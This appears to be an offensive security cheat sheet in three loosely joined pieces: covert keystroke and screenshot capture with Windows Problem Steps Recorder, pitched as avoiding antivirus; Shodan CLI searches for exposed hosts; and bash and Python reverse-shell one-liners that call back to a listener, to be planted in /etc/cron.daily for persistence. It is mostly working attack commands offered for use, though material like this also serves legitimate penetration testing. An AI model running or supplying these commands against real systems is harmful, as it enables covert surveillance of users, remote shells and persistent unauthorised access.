Windows workstations have a built-in utility called Problem Steps Recorder that can be used covertly by penetration testers to record keystrokes and screenshots of user activity. There is no risk of AV flagging this since it is a signed Microsoft binary.

To start logging the user's activity:

psr.exe /start /gui 0 /output C:\Users\user\AppData\Local\log.zip

To stop logging:

psr.exe /stop

Once the process is stopped, the zip file will be created.
Setting Up

sudo pip install shodan # Install shodan
shodan init API_KEY # Initialise it with your API key

Searching Existing Database

shodan search "net:212.159.101.101/24 port:22" # Search a specific IP range for a specific port
shodan search "nginx port:5011" # Search for banner text on a specific open port
All reverse shells assume a standard netcat listener on TCP port 443 of 192.168.1.100 (nc -nvlp 443) ready to catch the shell. Modify as needed.

Add one of these to one of the existing scripts in /etc/cron.daily to get persistence on a compromised Linux box.

# Shell script
sh -i >& /dev/tcp/192.168.1.100/443 0>&1

# Python
python -c 'import os,pty,sys,socket; sock=socket.socket(); sock.connect(("192.168.1.100",443)); [os.dup2(sock.fileno(),f) for f in (0,1,2)]; pty.spawn("/bin/sh")'